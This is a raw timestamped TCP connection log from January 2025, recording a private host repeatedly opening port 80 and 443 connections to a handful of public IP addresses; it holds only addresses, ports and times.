                                                              Jan 12, 2025 09:27:33.148606062 CET5044980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:33.153474092 CET8050449188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:33.153542042 CET5044980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:33.153578043 CET5044980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:33.158407927 CET8050449188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:33.489483118 CET8050447172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:33.489586115 CET5044780192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:33.490006924 CET8050447172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:33.490056992 CET5044780192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:33.490170956 CET50450443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:33.490216017 CET44350450104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:33.490277052 CET50450443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:33.490307093 CET50450443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:33.490438938 CET44350450104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:33.490495920 CET50450443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:33.490724087 CET5045180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:33.494416952 CET8050447172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:33.495668888 CET8050451104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:33.495753050 CET5045180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:33.495753050 CET5045180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:33.500611067 CET8050451104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:33.635546923 CET8050449188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:33.635694027 CET5044980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:33.636420012 CET50452443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:33.636435986 CET44350452172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:33.636483908 CET8050449188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:33.636537075 CET5044980192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:33.636564016 CET50452443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:33.636564016 CET50452443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:33.636677027 CET44350452172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:33.636830091 CET50452443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:33.636934042 CET5045380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:33.640481949 CET8050449188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:33.641757011 CET8050453172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:33.641877890 CET5045380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:33.641892910 CET5045380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:33.646703005 CET8050453172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:33.947213888 CET8050451104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:33.947299957 CET5045180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:33.947459936 CET8050451104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:33.947524071 CET5045180192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:33.949903965 CET50456443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:33.949966908 CET44350456104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:33.950037003 CET50456443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:33.950450897 CET50456443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:33.950488091 CET44350456104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:33.952198982 CET8050451104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:34.109716892 CET8050453172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:34.109831095 CET5045380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:34.110393047 CET50457443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:34.110415936 CET44350457172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:34.110480070 CET50457443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:34.110507011 CET50457443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:34.110585928 CET44350457172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:34.110646009 CET50457443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:34.110846043 CET8050453172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:34.110894918 CET5045380192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:34.110937119 CET5045880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:34.114634991 CET8050453172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:34.115756989 CET8050458172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:34.115905046 CET5045880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:34.115905046 CET5045880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:34.120729923 CET8050458172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:34.418972015 CET44350456104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:34.419178009 CET50456443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:34.420511961 CET50456443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:34.420672894 CET44350456104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:34.420779943 CET50456443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:34.421457052 CET50459443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:34.421482086 CET44350459188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:34.421583891 CET50459443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:34.421583891 CET50459443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:34.421735048 CET44350459188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:34.421823978 CET50459443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:34.422096014 CET5046080192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:34.430094004 CET8050460188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:34.430169106 CET5046080192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:34.430193901 CET5046080192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:34.435075045 CET8050460188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:34.643132925 CET8050458172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:34.643275976 CET5045880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:34.643290043 CET8050458172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:34.643342972 CET5045880192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:34.644135952 CET50461443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:34.644193888 CET44350461104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:34.644278049 CET50461443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:34.644331932 CET50461443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:34.644449949 CET44350461104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:34.644517899 CET50461443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:34.644943953 CET5046280192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:34.648438931 CET8050458172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:34.649770975 CET8050462104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:34.649842978 CET5046280192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:34.649889946 CET5046280192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:34.656152010 CET8050462104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:34.924479008 CET8050460188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:34.924653053 CET5046080192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:34.924690008 CET8050460188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:34.924751997 CET5046080192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:34.925558090 CET50463443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:34.925668955 CET44350463172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:34.925793886 CET50463443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:34.925867081 CET50463443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:34.925976992 CET44350463172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:34.926105976 CET50463443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:34.926163912 CET5046480192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:34.929560900 CET8050460188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:34.931150913 CET8050464172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:34.931219101 CET5046480192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:34.931261063 CET5046480192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:34.936095953 CET8050464172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:35.127326965 CET8050462104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:35.127490044 CET5046280192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:35.128099918 CET8050462104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:35.128199100 CET5046280192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:35.130403996 CET50467443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:35.130429029 CET44350467104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:39.669920921 CET50507443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:39.669959068 CET50507443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:39.670068979 CET44350507172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:39.670111895 CET50507443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:39.670336008 CET5050880192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:39.673759937 CET8050504188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:39.675183058 CET8050508172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:39.675244093 CET5050880192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:39.675282001 CET5050880192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:39.680115938 CET8050508172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:39.839659929 CET8050506104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:39.839853048 CET5050680192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:39.839858055 CET8050506104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:39.839912891 CET5050680192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:39.842248917 CET50512443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:39.842283964 CET44350512104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:39.842360020 CET50512443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:39.842777967 CET50512443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:39.842789888 CET44350512104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:39.844698906 CET8050506104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:40.136537075 CET8050508172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:40.136634111 CET5050880192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:40.137101889 CET8050508172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:40.137157917 CET5050880192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:40.137406111 CET50513443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:40.137507915 CET44350513172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:40.137602091 CET50513443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:40.137670040 CET50513443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:40.137779951 CET44350513172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:40.137844086 CET50513443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:40.137922049 CET5051480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:40.141500950 CET8050508172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:40.142771959 CET8050514172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:40.142832994 CET5051480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:40.142851114 CET5051480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:40.147715092 CET8050514172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:40.318865061 CET44350512104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:40.318947077 CET50512443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:40.320200920 CET50512443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:40.320239067 CET44350512104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:40.320302010 CET50512443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:40.320874929 CET50515443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:40.320900917 CET44350515188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:40.320980072 CET50515443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:40.321001053 CET50515443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:40.321074009 CET44350515188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:40.321125984 CET50515443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:40.321403027 CET5051680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:40.326318979 CET8050516188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:40.326406002 CET5051680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:40.326431036 CET5051680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:40.331223965 CET8050516188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:40.619185925 CET8050514172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:40.619627953 CET5051480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:40.619702101 CET8050514172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:40.619765997 CET5051480192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:40.620577097 CET50517443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:40.620620012 CET44350517104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:40.620714903 CET50517443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:40.620750904 CET50517443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:40.620855093 CET44350517104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:40.620913029 CET50517443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:40.621211052 CET5051880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:40.624509096 CET8050514172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:40.626045942 CET8050518104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:40.626102924 CET5051880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:40.626126051 CET5051880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:40.630907059 CET8050518104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:40.797707081 CET8050516188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:40.797801971 CET5051680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:40.798316956 CET8050516188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:40.798368931 CET5051680192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:40.798408985 CET50519443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:40.798444033 CET44350519172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:40.798506975 CET50519443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:40.798532009 CET50519443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:40.798619032 CET44350519172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:40.798661947 CET50519443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:40.798894882 CET5052080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:40.802623034 CET8050516188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:40.803755045 CET8050520172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:40.803819895 CET5052080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:40.803849936 CET5052080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:40.808710098 CET8050520172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:41.082376957 CET8050518104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:41.082499981 CET5051880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:41.082987070 CET8050518104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:41.083096981 CET5051880192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:41.085117102 CET50523443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:41.085167885 CET44350523104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:41.085252047 CET50523443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:41.085745096 CET50523443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:41.085763931 CET44350523104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:41.087366104 CET8050518104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:41.256297112 CET8050520172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:41.256388903 CET5052080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:41.256666899 CET8050520172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:41.256716967 CET5052080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:41.257050991 CET50524443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:41.257155895 CET44350524172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:41.257252932 CET50524443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:41.257252932 CET50524443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:41.257422924 CET44350524172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:41.257486105 CET50524443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:41.257627964 CET5052580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:41.261208057 CET8050520172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:41.262510061 CET8050525172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:41.262597084 CET5052580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:41.262597084 CET5052580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:41.267412901 CET8050525172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:41.539542913 CET44350523104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:41.539720058 CET50523443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:41.579680920 CET50523443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:41.579792976 CET44350523104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:41.579869986 CET50523443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:41.580296993 CET50526443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:41.580353975 CET44350526188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:41.580430984 CET50526443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:41.580487967 CET50526443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:41.580581903 CET44350526188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:41.580636978 CET50526443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:41.580923080 CET5052780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:41.586474895 CET8050527188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:41.586563110 CET5052780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:41.586620092 CET5052780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:41.592138052 CET8050527188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:41.733855009 CET8050525172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:41.734024048 CET5052580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:41.734106064 CET8050525172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:41.734172106 CET5052580192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:41.734817028 CET50528443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:41.734853029 CET44350528104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:41.734935045 CET50528443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:41.734978914 CET50528443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:41.735073090 CET44350528104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:41.735152006 CET50528443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:41.735564947 CET5052980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:41.738850117 CET8050525172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:41.740478039 CET8050529104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:41.740596056 CET5052980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:41.740596056 CET5052980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:41.745467901 CET8050529104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:42.045916080 CET8050527188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:42.046089888 CET5052780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:42.046153069 CET8050527188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:42.046221972 CET5052780192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:42.046854973 CET50530443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:42.046925068 CET44350530172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:42.047017097 CET50530443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:42.047086000 CET50530443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:42.047173023 CET44350530172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:42.047236919 CET50530443192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:42.047519922 CET5053180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:42.050964117 CET8050527188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:42.052359104 CET8050531172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:42.052422047 CET5053180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:42.052455902 CET5053180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:42.057301044 CET8050531172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:42.189747095 CET8050529104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:42.189910889 CET5052980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:42.190243006 CET8050529104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:42.190310955 CET5052980192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:42.192924976 CET50534443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:42.192969084 CET44350534104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:42.193039894 CET50534443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:42.193577051 CET50534443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:42.193598986 CET44350534104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:42.194825888 CET8050529104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:42.534681082 CET8050531172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:42.534790993 CET5053180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:42.534986019 CET8050531172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:42.535063982 CET5053180192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:42.535609961 CET50535443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:42.535641909 CET44350535172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:42.535720110 CET50535443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:42.535783052 CET50535443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:42.535909891 CET44350535172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:42.536001921 CET50535443192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:42.536391973 CET5053680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:42.539637089 CET8050531172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:42.541229010 CET8050536172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:42.541306973 CET5053680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:42.541354895 CET5053680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:42.546113968 CET8050536172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:42.666347027 CET44350534104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:42.666472912 CET50534443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:42.669771910 CET50534443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:42.669807911 CET44350534104.21.60.172192.168.2.7
                                                              Jan 12, 2025 09:27:42.669866085 CET50534443192.168.2.7104.21.60.172
                                                              Jan 12, 2025 09:27:42.670568943 CET50537443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:42.670607090 CET44350537188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:42.670687914 CET50537443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:42.670711994 CET50537443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:42.670783997 CET44350537188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:42.670836926 CET50537443192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:42.671133041 CET5053880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:42.675998926 CET8050538188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:42.676191092 CET5053880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:42.676211119 CET5053880192.168.2.7188.114.97.3
                                                              Jan 12, 2025 09:27:42.681003094 CET8050538188.114.97.3192.168.2.7
                                                              Jan 12, 2025 09:27:43.017940998 CET8050536172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:43.018069029 CET5053680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:43.018412113 CET8050536172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:43.018471956 CET5053680192.168.2.7172.67.176.186
                                                              Jan 12, 2025 09:27:43.018812895 CET50539443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:43.018860102 CET44350539104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:43.018933058 CET50539443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:43.018969059 CET50539443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:43.019057989 CET44350539104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:43.019114971 CET50539443192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:43.019526005 CET5054080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:43.022933006 CET8050536172.67.176.186192.168.2.7
                                                              Jan 12, 2025 09:27:43.024391890 CET8050540104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:43.024590969 CET5054080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:43.024660110 CET5054080192.168.2.7104.21.64.1
                                                              Jan 12, 2025 09:27:43.029561043 CET8050540104.21.64.1192.168.2.7
                                                              Jan 12, 2025 09:27:50.245635986 CET8050580172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:50.245686054 CET8050582172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:50.245831013 CET5058080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:50.245893955 CET8050580172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:50.245959997 CET5058080192.168.2.7172.67.198.113
                                                              Jan 12, 2025 09:27:50.246221066 CET8050582172.67.198.113192.168.2.7
                                                              Jan 12, 2025 09:27:50.246287107 CET5058280192.168.2.7172.67.198.113
